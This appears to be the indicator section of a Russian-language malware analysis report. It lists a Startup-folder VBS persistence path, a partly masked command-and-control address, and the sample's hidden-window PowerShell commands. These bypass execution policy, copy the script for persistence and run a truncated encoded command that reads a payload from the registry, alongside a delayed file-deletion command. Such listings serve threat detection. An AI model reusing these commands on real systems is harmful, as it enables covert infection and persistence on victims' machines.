Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\nbafg.vbs
- '18#.#19.176.89':82
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '<PATH_SAMPLE>.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Nbafg.vbs';' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAGIAYQBmAGcAXAApAC4ATgBiAGEAZgBnACkAOwAgA...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C Y /N /D Y /T 1 & Del "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '<PATH_SAMPLE>.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Nbafg.vbs';
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAGIAYQBmAGcAXAApAC4ATgBiAGEAZgBnACkAOwAgA...
- '<SYSTEM32>\cmd.exe' /C Y /N /D Y /T 1 & Del "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe"